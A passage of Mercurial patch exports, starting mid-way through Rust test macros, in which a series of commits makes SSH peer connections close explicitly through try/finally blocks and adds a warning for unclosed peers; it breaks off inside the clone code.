$(,)* + ) => { + map!(OrdMap<_, _> {$( + String::from($dest) => ( + $src_rev, + $src_path, + set!(OrdSet<Revision> $src_overwrite) + ) + ),*}) + }; +} + +macro_rules! combine_changeset_copies { + ( + $children_count: tt, + [ + $( + { + rev: $rev: expr, + p1: $p1: expr, + p2: $p2: expr, + actions: [ + $( + $Action: ident($( $action_path: expr ),+) + ),* + $(,)? + ], + merge_cases: $merge: tt + $(,)? + } + ),* + $(,)? 
+ ], + $target_rev: expr $(,)* + ) => {{ + let count = map!(HashMap<Revision, usize> $children_count); + let mut combine_changeset_copies = CombineChangesetCopies::new(count); + $( + let actions = vec![$( + $Action($( HgPath::new($action_path) ),*) + ),*]; + combine_changeset_copies.add_revision_inner( + $rev, $p1, $p2, actions.into_iter(), + merge_case_callback! $merge + ); + )* + combine_changeset_copies.finish($target_rev) + }}; +} + +macro_rules! path_copies { + ( + $( $expected_destination: expr => $expected_source: expr ),* $(,)? + ) => { + map!(PathCopies {$( + HgPath::new($expected_destination).to_owned() + => HgPath::new($expected_source).to_owned(), + ),*}) + }; +} # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613415576 18000 # Mon Feb 15 13:59:36 2021 -0500 # Node ID 8c4906105f37033dbd57340363ce09fef05572ed # Parent fa21633af20198d9006ced9a0eae063af08df165 sshpeer: make sshpeer.close() close the underlying connection So the connection can be closed eagerly in future commits, instead of relying on __del__. Differential Revision: https://phab.mercurial-scm.org/D9995 diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -434,7 +434,7 @@ return True def close(self): - pass + self._cleanup() # End of ipeerconnection interface. # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613416298 18000 # Mon Feb 15 14:11:38 2021 -0500 # Node ID 0738bc25d6acce9d92be34118f60f80955b9007b # Parent 8c4906105f37033dbd57340363ce09fef05572ed sshpeer: add a method to check if a doublepipe is closed So we can tell in a next commit if we're trying to close an already closed connection or not (in which case, we may warn). 
Differential Revision: https://phab.mercurial-scm.org/D9996 diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -140,6 +140,10 @@ def close(self): return self._main.close() + @property + def closed(self): + return self._main.closed + def flush(self): return self._main.flush() diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -113,6 +113,10 @@ def close(self): pass + @property + def closed(self): + pass + def main(): ui = uimod.ui() # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613416502 18000 # Mon Feb 15 14:15:02 2021 -0500 # Node ID 0509cee38757ea336a9cdfa41a3d06962c46a238 # Parent 0738bc25d6acce9d92be34118f60f80955b9007b remotefilelog: rework workaround for sshpeer deadlocks The wrapping of `sshpeer.cleanup` silently broke when `cleanup` was renamed to `_cleanup`, a couple of years ago. I don't know what `orig.im_self` is, but regardless, the intention of the wrapping seems pretty clear: close stderr before sshpeer._cleanuppipes blocks on it. So do that. Differential Revision: https://phab.mercurial-scm.org/D9997 diff --git a/hgext/remotefilelog/connectionpool.py b/hgext/remotefilelog/connectionpool.py --- a/hgext/remotefilelog/connectionpool.py +++ b/hgext/remotefilelog/connectionpool.py @@ -43,17 +43,19 @@ if conn is None: - def _cleanup(orig): - # close pipee first so peer.cleanup reading it won't deadlock, - # if there are other processes with pipeo open (i.e. us). 
- peer = orig.im_self - if util.safehasattr(peer, 'pipee'): - peer.pipee.close() - return orig() + peer = hg.peer(self._repo.ui, {}, path) + if util.safehasattr(peer, '_cleanup'): - peer = hg.peer(self._repo.ui, {}, path) - if util.safehasattr(peer, 'cleanup'): - extensions.wrapfunction(peer, b'cleanup', _cleanup) + class mypeer(peer.__class__): + def _cleanup(self): + # close pipee first so peer.cleanup reading it won't + # deadlock, if there are other processes with pipeo + # open (i.e. us). + if util.safehasattr(self, 'pipee'): + self.pipee.close() + return super(mypeer, self)._cleanup() + + peer.__class__ = mypeer conn = connection(pathpool, peer) # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613418017 18000 # Mon Feb 15 14:40:17 2021 -0500 # Node ID db8037e38085910cc73ecaec73e8090555acd346 # Parent 0509cee38757ea336a9cdfa41a3d06962c46a238 sshpeer: add a develwarning if an sshpeer is not closed explicitly The warning is disabled until the next commit, because fixing it results in a noisy diff due to indentation changes. Differential Revision: https://phab.mercurial-scm.org/D9998 diff --git a/hgext/remotefilelog/connectionpool.py b/hgext/remotefilelog/connectionpool.py --- a/hgext/remotefilelog/connectionpool.py +++ b/hgext/remotefilelog/connectionpool.py @@ -47,7 +47,7 @@ if util.safehasattr(peer, '_cleanup'): class mypeer(peer.__class__): - def _cleanup(self): + def _cleanup(self, warn=None): # close pipee first so peer.cleanup reading it won't # deadlock, if there are other processes with pipeo # open (i.e. us). 
diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -148,14 +148,18 @@ return self._main.flush() -def _cleanuppipes(ui, pipei, pipeo, pipee): +def _cleanuppipes(ui, pipei, pipeo, pipee, warn): """Clean up pipes used by an SSH connection.""" - if pipeo: + didsomething = False + if pipeo and not pipeo.closed: + didsomething = True pipeo.close() - if pipei: + if pipei and not pipei.closed: + didsomething = True pipei.close() - if pipee: + if pipee and not pipee.closed: + didsomething = True # Try to read from the err descriptor until EOF. try: for l in pipee: @@ -165,6 +169,17 @@ pipee.close() + if didsomething and warn is not None: + # Encourage explicit close of sshpeers. Closing via __del__ is + # not very predictable when exceptions are thrown, which has led + # to deadlocks due to a peer getting gc'ed in a fork + # We add our own stack trace, because the stacktrace when called + # from __del__ is useless. + if False: # enabled in next commit + ui.develwarn( + b'missing close on SSH connection created at:\n%s' % warn + ) + def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None): """Create an SSH connection to a server. @@ -416,6 +431,7 @@ self._pipee = stderr self._caps = caps self._autoreadstderr = autoreadstderr + self._initstack = b''.join(util.getstackframes(1)) # Commands that have a "framed" response where the first line of the # response contains the length of that response. 
@@ -456,10 +472,11 @@ self._cleanup() raise exception - def _cleanup(self): - _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee) + def _cleanup(self, warn=None): + _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee, warn=warn) - __del__ = _cleanup + def __del__(self): + self._cleanup(warn=self._initstack) def _sendrequest(self, cmd, args, framed=False): if self.ui.debugflag and self.ui.configbool( @@ -611,7 +628,7 @@ try: protoname, caps = _performhandshake(ui, stdin, stdout, stderr) except Exception: - _cleanuppipes(ui, stdout, stdin, stderr) + _cleanuppipes(ui, stdout, stdin, stderr, warn=None) raise if protoname == wireprototypes.SSHV1: @@ -637,7 +654,7 @@ autoreadstderr=autoreadstderr, ) else: - _cleanuppipes(ui, stdout, stdin, stderr) + _cleanuppipes(ui, stdout, stdin, stderr, warn=None) raise error.RepoError( _(b'unknown version of SSH protocol: %s') % protoname ) # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613418516 18000 # Mon Feb 15 14:48:36 2021 -0500 # Node ID a4c19a162615afd0dc8ab571be25d3134da7b15d # Parent db8037e38085910cc73ecaec73e8090555acd346 sshpeer: enable+fix warning about sshpeers not being closed explicitly I recommend looking at this with a diff that ignores indentation. The test changes are because localrepo.close() updates some cache, which appears happens earlier now on rollbacks or strips or something. The http changes are because httppeer.close() prints stats with --verbose. 
Differential Revision: https://phab.mercurial-scm.org/D9999 diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -704,16 +704,19 @@ if scratchbookmarks: other = hg.peer(repo, opts, source) - fetchedbookmarks = other.listkeyspatterns( - b'bookmarks', patterns=scratchbookmarks - ) - for bookmark in scratchbookmarks: - if bookmark not in fetchedbookmarks: - raise error.Abort( - b'remote bookmark %s not found!' % bookmark - ) - scratchbookmarks[bookmark] = fetchedbookmarks[bookmark] - revs.append(fetchedbookmarks[bookmark]) + try: + fetchedbookmarks = other.listkeyspatterns( + b'bookmarks', patterns=scratchbookmarks + ) + for bookmark in scratchbookmarks: + if bookmark not in fetchedbookmarks: + raise error.Abort( + b'remote bookmark %s not found!' % bookmark + ) + scratchbookmarks[bookmark] = fetchedbookmarks[bookmark] + revs.append(fetchedbookmarks[bookmark]) + finally: + other.close() opts[b'bookmark'] = bookmarks opts[b'rev'] = revs @@ -848,10 +851,13 @@ if common.isremotebooksenabled(ui): if bookmark and scratchpush: other = hg.peer(repo, opts, destpath) - fetchedbookmarks = other.listkeyspatterns( - b'bookmarks', patterns=[bookmark] - ) - remotescratchbookmarks.update(fetchedbookmarks) + try: + fetchedbookmarks = other.listkeyspatterns( + b'bookmarks', patterns=[bookmark] + ) + remotescratchbookmarks.update(fetchedbookmarks) + finally: + other.close() _saveremotebookmarks(repo, remotescratchbookmarks, destpath) if oldphasemove: exchange._localphasemove = oldphasemove diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -595,77 +595,83 @@ ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) remote = hg.peer(repo, opts, url) - # check narrow support before doing anything if widening needs to be - # performed. 
In future we should also abort if client is ellipses and - # server does not support ellipses - if widening and wireprototypes.NARROWCAP not in remote.capabilities(): - raise error.Abort(_(b"server does not support narrow clones")) + try: + # check narrow support before doing anything if widening needs to be + # performed. In future we should also abort if client is ellipses and + # server does not support ellipses + if ( + widening + and wireprototypes.NARROWCAP not in remote.capabilities() + ): + raise error.Abort(_(b"server does not support narrow clones")) - commoninc = discovery.findcommonincoming(repo, remote) + commoninc = discovery.findcommonincoming(repo, remote) - if autoremoveincludes: - outgoing = discovery.findcommonoutgoing( - repo, remote, commoninc=commoninc - ) - ui.status(_(b'looking for unused includes to remove\n')) - localfiles = set() - for n in itertools.chain(outgoing.missing, outgoing.excluded): - localfiles.update(repo[n].files()) - suggestedremovals = [] - for include in sorted(oldincludes): - match = narrowspec.match(repo.root, [include], oldexcludes) - if not any(match(f) for f in localfiles): - suggestedremovals.append(include) - if suggestedremovals: - for s in suggestedremovals: - ui.status(b'%s\n' % s) - if ( - ui.promptchoice( - _( - b'remove these unused includes (yn)?' - b'$$ &Yes $$ &No' + if autoremoveincludes: + outgoing = discovery.findcommonoutgoing( + repo, remote, commoninc=commoninc + ) + ui.status(_(b'looking for unused includes to remove\n')) + localfiles = set() + for n in itertools.chain(outgoing.missing, outgoing.excluded): + localfiles.update(repo[n].files()) + suggestedremovals = [] + for include in sorted(oldincludes): + match = narrowspec.match(repo.root, [include], oldexcludes) + if not any(match(f) for f in localfiles): + suggestedremovals.append(include) + if suggestedremovals: + for s in suggestedremovals: + ui.status(b'%s\n' % s) + if ( + ui.promptchoice( + _( + b'remove these unused includes (yn)?' 
+ b'$$ &Yes $$ &No' + ) ) - ) - == 0 - ): - removedincludes.update(suggestedremovals) - narrowing = True - else: - ui.status(_(b'found no unused includes\n')) + == 0 + ): + removedincludes.update(suggestedremovals) + narrowing = True + else: + ui.status(_(b'found no unused includes\n')) - if narrowing: - newincludes = oldincludes - removedincludes - newexcludes = oldexcludes | addedexcludes - _narrow( - ui, - repo, - remote, - commoninc, - oldincludes, - oldexcludes, - newincludes, - newexcludes, - opts[b'force_delete_local_changes'], - opts[b'backup'], - ) - # _narrow() updated the narrowspec and _widen() below needs to - # use the updated values as its base (otherwise removed includes - # and addedexcludes will be lost in the resulting narrowspec) - oldincludes = newincludes - oldexcludes = newexcludes + if narrowing: + newincludes = oldincludes - removedincludes + newexcludes = oldexcludes | addedexcludes + _narrow( + ui, + repo, + remote, + commoninc, + oldincludes, + oldexcludes, + newincludes, + newexcludes, + opts[b'force_delete_local_changes'], + opts[b'backup'], + ) + # _narrow() updated the narrowspec and _widen() below needs to + # use the updated values as its base (otherwise removed includes + # and addedexcludes will be lost in the resulting narrowspec) + oldincludes = newincludes + oldexcludes = newexcludes - if widening: - newincludes = oldincludes | addedincludes - newexcludes = oldexcludes - removedexcludes - _widen( - ui, - repo, - remote, - commoninc, - oldincludes, - oldexcludes, - newincludes, - newexcludes, - ) + if widening: + newincludes = oldincludes | addedincludes + newexcludes = oldexcludes - removedexcludes + _widen( + ui, + repo, + remote, + commoninc, + oldincludes, + oldexcludes, + newincludes, + newexcludes, + ) + finally: + remote.close() return 0 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -3820,132 +3820,138 @@ output = [] revs = [] - if source: - source, 
branches = hg.parseurl(ui.expandpath(source)) - peer = hg.peer(repo or ui, opts, source) # only pass ui when no repo - repo = peer.local() - revs, checkout = hg.addbranchrevs(repo, peer, branches, None) - - fm = ui.formatter(b'identify', opts) - fm.startitem() - - if not repo: - if num or branch or tags: - raise error.InputError( - _(b"can't query remote revision number, branch, or tags") - ) - if not rev and revs: - rev = revs[0] - if not rev: - rev = b"tip" - - remoterev = peer.lookup(rev) - hexrev = fm.hexfunc(remoterev) - if default or id: - output = [hexrev] - fm.data(id=hexrev) - - @util.cachefunc - def getbms(): - bms = [] - - if b'bookmarks' in peer.listkeys(b'namespaces'): - hexremoterev = hex(remoterev) - bms = [ - bm - for bm, bmr in pycompat.iteritems( - peer.listkeys(b'bookmarks') + peer = None + try: + if source: + source, branches = hg.parseurl(ui.expandpath(source)) + # only pass ui when no repo + peer = hg.peer(repo or ui, opts, source) + repo = peer.local() + revs, checkout = hg.addbranchrevs(repo, peer, branches, None) + + fm = ui.formatter(b'identify', opts) + fm.startitem() + + if not repo: + if num or branch or tags: + raise error.InputError( + _(b"can't query remote revision number, branch, or tags") + ) + if not rev and revs: + rev = revs[0] + if not rev: + rev = b"tip" + + remoterev = peer.lookup(rev) + hexrev = fm.hexfunc(remoterev) + if default or id: + output = [hexrev] + fm.data(id=hexrev) + + @util.cachefunc + def getbms(): + bms = [] + + if b'bookmarks' in peer.listkeys(b'namespaces'): + hexremoterev = hex(remoterev) + bms = [ + bm + for bm, bmr in pycompat.iteritems( + peer.listkeys(b'bookmarks') + ) + if bmr == hexremoterev + ] + + return sorted(bms) + + if fm.isplain(): + if bookmarks: + output.extend(getbms()) + elif default and not ui.quiet: + # multiple bookmarks for a single parent separated by '/' + bm = b'/'.join(getbms()) + if bm: + output.append(bm) + else: + fm.data(node=hex(remoterev)) + if bookmarks or b'bookmarks' in 
fm.datahint(): + fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark')) + else: + if rev: + repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn') + ctx = scmutil.revsingle(repo, rev, None) + + if ctx.rev() is None: + ctx = repo[None] + parents = ctx.parents() + taglist = [] + for p in parents: + taglist.extend(p.tags()) + + dirty = b"" + if ctx.dirty(missing=True, merge=False, branch=False): + dirty = b'+' + fm.data(dirty=dirty) + + hexoutput = [fm.hexfunc(p.node()) for p in parents] + if default or id: + output = [b"%s%s" % (b'+'.join(hexoutput), dirty)] + fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty)) + + if num: + numoutput = [b"%d" % p.rev() for p in parents] + output.append(b"%s%s" % (b'+'.join(numoutput), dirty)) + + fm.data( + parents=fm.formatlist( + [fm.hexfunc(p.node()) for p in parents], name=b'node' ) - if bmr == hexremoterev - ] - - return sorted(bms) - - if fm.isplain(): - if bookmarks: - output.extend(getbms()) - elif default and not ui.quiet: + ) + else: + hexoutput = fm.hexfunc(ctx.node()) + if default or id: + output = [hexoutput] + fm.data(id=hexoutput) + + if num: + output.append(pycompat.bytestr(ctx.rev())) + taglist = ctx.tags() + + if default and not ui.quiet: + b = ctx.branch() + if b != b'default': + output.append(b"(%s)" % b) + + # multiple tags for a single parent separated by '/' + t = b'/'.join(taglist) + if t: + output.append(t) + # multiple bookmarks for a single parent separated by '/' - bm = b'/'.join(getbms()) + bm = b'/'.join(ctx.bookmarks()) if bm: output.append(bm) - else: - fm.data(node=hex(remoterev)) - if bookmarks or b'bookmarks' in fm.datahint(): - fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark')) - else: - if rev: - repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn') - ctx = scmutil.revsingle(repo, rev, None) - - if ctx.rev() is None: - ctx = repo[None] - parents = ctx.parents() - taglist = [] - for p in parents: - taglist.extend(p.tags()) - - dirty = b"" - if ctx.dirty(missing=True, 
merge=False, branch=False): - dirty = b'+' - fm.data(dirty=dirty) - - hexoutput = [fm.hexfunc(p.node()) for p in parents] - if default or id: - output = [b"%s%s" % (b'+'.join(hexoutput), dirty)] - fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty)) - - if num: - numoutput = [b"%d" % p.rev() for p in parents] - output.append(b"%s%s" % (b'+'.join(numoutput), dirty)) - - fm.data( - parents=fm.formatlist( - [fm.hexfunc(p.node()) for p in parents], name=b'node' - ) - ) - else: - hexoutput = fm.hexfunc(ctx.node()) - if default or id: - output = [hexoutput] - fm.data(id=hexoutput) - - if num: - output.append(pycompat.bytestr(ctx.rev())) - taglist = ctx.tags() - - if default and not ui.quiet: - b = ctx.branch() - if b != b'default': - output.append(b"(%s)" % b) - - # multiple tags for a single parent separated by '/' - t = b'/'.join(taglist) - if t: - output.append(t) - - # multiple bookmarks for a single parent separated by '/' - bm = b'/'.join(ctx.bookmarks()) - if bm: - output.append(bm) - else: - if branch: - output.append(ctx.branch()) - - if tags: - output.extend(taglist) - - if bookmarks: - output.extend(ctx.bookmarks()) - - fm.data(node=ctx.hex()) - fm.data(branch=ctx.branch()) - fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':')) - fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark')) - fm.context(ctx=ctx) - - fm.plain(b"%s\n" % b' '.join(output)) - fm.end() + else: + if branch: + output.append(ctx.branch()) + + if tags: + output.extend(taglist) + + if bookmarks: + output.extend(ctx.bookmarks()) + + fm.data(node=ctx.hex()) + fm.data(branch=ctx.branch()) + fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':')) + fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark')) + fm.context(ctx=ctx) + + fm.plain(b"%s\n" % b' '.join(output)) + fm.end() + finally: + if peer: + peer.close() @command( @@ -4291,12 +4297,15 @@ ui.expandpath(source), opts.get(b'branch') ) other = hg.peer(repo, opts, source) - if b'bookmarks' not in 
other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) - return bookmarks.incoming(ui, repo, other) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.pager(b'incoming') + ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + return bookmarks.incoming(ui, repo, other) + finally: + other.close() repo._subtoppath = ui.expandpath(source) try: @@ -4327,7 +4336,8 @@ Returns 0 on success. """ opts = pycompat.byteskwargs(opts) - hg.peer(ui, opts, ui.expandpath(dest), create=True) + peer = hg.peer(ui, opts, ui.expandpath(dest), create=True) + peer.close() @command( @@ -4963,12 +4973,15 @@ if opts.get(b'bookmarks'): dest = path.pushloc or path.loc other = hg.peer(repo, opts, dest) - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) - ui.pager(b'outgoing') - return bookmarks.outgoing(ui, repo, other) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.pager(b'outgoing') + return bookmarks.outgoing(ui, repo, other) + finally: + other.close() repo._subtoppath = path.pushloc or path.loc try: @@ -5679,63 +5692,67 @@ revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev')) other = hg.peer(repo, opts, dest) - if revs: - revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] - if not revs: + try: + if revs: + revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] + if not revs: + raise error.InputError( + _(b"specified revisions evaluate to an empty set"), + hint=_(b"use different revision arguments"), + ) + elif path.pushrev: + # It doesn't make any sense to 
specify ancestor revisions. So limit + # to DAG heads to make discovery simpler. + expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) + revs = scmutil.revrange(repo, [expr]) + revs = [repo[rev].node() for rev in revs] + if not revs: + raise error.InputError( + _(b'default push revset for path evaluates to an empty set') + ) + elif ui.configbool(b'commands', b'push.require-revs'): raise error.InputError( - _(b"specified revisions evaluate to an empty set"), - hint=_(b"use different revision arguments"), + _(b'no revisions specified to push'), + hint=_(b'did you mean "hg push -r ."?'), ) - elif path.pushrev: - # It doesn't make any sense to specify ancestor revisions. So limit - # to DAG heads to make discovery simpler. - expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) - revs = scmutil.revrange(repo, [expr]) - revs = [repo[rev].node() for rev in revs] - if not revs: - raise error.InputError( - _(b'default push revset for path evaluates to an empty set') - ) - elif ui.configbool(b'commands', b'push.require-revs'): - raise error.InputError( - _(b'no revisions specified to push'), - hint=_(b'did you mean "hg push -r ."?'), + + repo._subtoppath = dest + try: + # push subrepos depth-first for coherent ordering + c = repo[b'.'] + subs = c.substate # only repos that are committed + for s in sorted(subs): + result = c.sub(s).push(opts) + if result == 0: + return not result + finally: + del repo._subtoppath + + opargs = dict( + opts.get(b'opargs', {}) + ) # copy opargs since we may mutate it + opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) + + pushop = exchange.push( + repo, + other, + opts.get(b'force'), + revs=revs, + newbranch=opts.get(b'new_branch'), + bookmarks=opts.get(b'bookmark', ()), + publish=opts.get(b'publish'), + opargs=opargs, ) - repo._subtoppath = dest - try: - # push subrepos depth-first for coherent ordering - c = repo[b'.'] - subs = c.substate # only repos that are committed - for s in sorted(subs): - result = 
c.sub(s).push(opts) - if result == 0: - return not result + result = not pushop.cgresult + + if pushop.bkresult is not None: + if pushop.bkresult == 2: + result = 2 + elif not result and pushop.bkresult: + result = 2 finally: - del repo._subtoppath - - opargs = dict(opts.get(b'opargs', {})) # copy opargs since we may mutate it - opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) - - pushop = exchange.push( - repo, - other, - opts.get(b'force'), - revs=revs, - newbranch=opts.get(b'new_branch'), - bookmarks=opts.get(b'bookmark', ()), - publish=opts.get(b'publish'), - opargs=opargs, - ) - - result = not pushop.cgresult - - if pushop.bkresult is not None: - if pushop.bkresult == 2: - result = 2 - elif not result and pushop.bkresult: - result = 2 - + other.close() return result diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -471,17 +471,20 @@ """lists the capabilities of a remote peer""" opts = pycompat.byteskwargs(opts) peer = hg.peer(ui, opts, path) - caps = peer.capabilities() - ui.writenoi18n(b'Main capabilities:\n') - for c in sorted(caps): - ui.write(b' %s\n' % c) - b2caps = bundle2.bundle2caps(peer) - if b2caps: - ui.writenoi18n(b'Bundle2 capabilities:\n') - for key, values in sorted(pycompat.iteritems(b2caps)): - ui.write(b' %s\n' % key) - for v in values: - ui.write(b' %s\n' % v) + try: + caps = peer.capabilities() + ui.writenoi18n(b'Main capabilities:\n') + for c in sorted(caps): + ui.write(b' %s\n' % c) + b2caps = bundle2.bundle2caps(peer) + if b2caps: + ui.writenoi18n(b'Bundle2 capabilities:\n') + for key, values in sorted(pycompat.iteritems(b2caps)): + ui.write(b' %s\n' % key) + for v in values: + ui.write(b' %s\n' % v) + finally: + peer.close() @command( @@ -2615,12 +2618,17 @@ with ui.configoverride(overrides): peer = hg.peer(ui, {}, path) - local = peer.local() is not None - canpush = peer.canpush() - - ui.write(_(b'url: %s\n') % peer.url()) - 
ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no'))) - ui.write(_(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no'))) + try: + local = peer.local() is not None + canpush = peer.canpush() + + ui.write(_(b'url: %s\n') % peer.url()) + ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no'))) + ui.write( + _(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no')) + ) + finally: + peer.close() @command( @@ -2723,26 +2731,30 @@ """ target = hg.peer(ui, {}, repopath) - if keyinfo: - key, old, new = keyinfo - with target.commandexecutor() as e: - r = e.callcommand( - b'pushkey', - { - b'namespace': namespace, - b'key': key, - b'old': old, - b'new': new, - }, - ).result() - - ui.status(pycompat.bytestr(r) + b'\n') - return not r - else: - for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))): - ui.write( - b"%s\t%s\n" % (stringutil.escapestr(k), stringutil.escapestr(v)) - ) + try: + if keyinfo: + key, old, new = keyinfo + with target.commandexecutor() as e: + r = e.callcommand( + b'pushkey', + { + b'namespace': namespace, + b'key': key, + b'old': old, + b'new': new, + }, + ).result() + + ui.status(pycompat.bytestr(r) + b'\n') + return not r + else: + for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))): + ui.write( + b"%s\t%s\n" + % (stringutil.escapestr(k), stringutil.escapestr(v)) + ) + finally: + target.close() @command(b'debugpvec', [], _(b'A B')) @@ -4095,19 +4107,22 @@ def debugwireargs(ui, repopath, *vals, **opts): opts = pycompat.byteskwargs(opts) repo = hg.peer(ui, opts, repopath) - for opt in cmdutil.remoteopts: - del opts[opt[1]] - args = {} - for k, v in pycompat.iteritems(opts): - if v: - args[k] = v - args = pycompat.strkwargs(args) - # run twice to check that we don't mess up the stream for the next command - res1 = repo.debugwireargs(*vals, **args) - res2 = repo.debugwireargs(*vals, **args) - ui.write(b"%s\n" % res1) - if res1 != res2: - ui.warn(b"%s\n" % res2) + try: + for opt in cmdutil.remoteopts: + 
del opts[opt[1]] + args = {} + for k, v in pycompat.iteritems(opts): + if v: + args[k] = v + args = pycompat.strkwargs(args) + # run twice to check that we don't mess up the stream for the next command + res1 = repo.debugwireargs(*vals, **args) + res2 = repo.debugwireargs(*vals, **args) + ui.write(b"%s\n" % res1) + if res1 != res2: + ui.warn(b"%s\n" % res2) + finally: + repo.close() def _parsewirelangblocks(fh): diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -678,140 +678,148 @@ srcpeer = source.peer() # in case we were called with a localrepo branches = (None, branch or []) origsource = source = srcpeer.url() - revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs) + srclock = destlock = cleandir = None + destpeer = None + try: + revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs) - if dest is None: - dest = defaultdest(source) - if dest: - ui.status(_(b"destination directory: %s\n") % dest) - else: - dest = ui.expandpath(dest) + if dest is None: + dest = defaultdest(source) + if dest: + ui.status(_(b"destination directory: %s\n") % dest) + else: + dest = ui.expandpath(dest) - dest = util.urllocalpath(dest) - source = util.urllocalpath(source) + dest = util.urllocalpath(dest) + source = util.urllocalpath(source) - if not dest: - raise error.InputError(_(b"empty destination path is not valid")) + if not dest: + raise error.InputError(_(b"empty destination path is not valid")) - destvfs = vfsmod.vfs(dest, expandpath=True) - if destvfs.lexists(): - if not destvfs.isdir(): - raise error.InputError(_(b"destination '%s' already exists") % dest) - elif destvfs.listdir(): - raise error.InputError(_(b"destination '%s' is not empty") % dest) + destvfs = vfsmod.vfs(dest, expandpath=True) + if destvfs.lexists(): + if not destvfs.isdir(): + raise error.InputError( + _(b"destination '%s' already exists") % dest + ) + elif destvfs.listdir(): + raise error.InputError( + _(b"destination '%s' is not empty") % 
dest + ) - createopts = {} - narrow = False - - if storeincludepats is not None: - narrowspec.validatepatterns(storeincludepats) - narrow = True + createopts = {} + narrow = False - if storeexcludepats is not None: - narrowspec.validatepatterns(storeexcludepats) - narrow = True + if storeincludepats is not None: + narrowspec.validatepatterns(storeincludepats) + narrow = True + + if storeexcludepats is not None: + narrowspec.validatepatterns(storeexcludepats) + narrow = True - if narrow: - # Include everything by default if only exclusion patterns defined. - if storeexcludepats and not storeincludepats: - storeincludepats = {b'path:.'} + if narrow: + # Include everything by default if only exclusion patterns defined. + if storeexcludepats and not storeincludepats: + storeincludepats = {b'path:.'} - createopts[b'narrowfiles'] = True + createopts[b'narrowfiles'] = True - if depth: - createopts[b'shallowfilestore'] = True + if depth: + createopts[b'shallowfilestore'] = True - if srcpeer.capable(b'lfs-serve'): - # Repository creation honors the config if it disabled the extension, so - # we can't just announce that lfs will be enabled. This check avoids - # saying that lfs will be enabled, and then saying it's an unknown - # feature. The lfs creation option is set in either case so that a - # requirement is added. If the extension is explicitly disabled but the - # requirement is set, the clone aborts early, before transferring any - # data. - createopts[b'lfs'] = True + if srcpeer.capable(b'lfs-serve'): + # Repository creation honors the config if it disabled the extension, so + # we can't just announce that lfs will be enabled. This check avoids + # saying that lfs will be enabled, and then saying it's an unknown + # feature. The lfs creation option is set in either case so that a + # requirement is added. If the extension is explicitly disabled but the + # requirement is set, the clone aborts early, before transferring any + # data. 
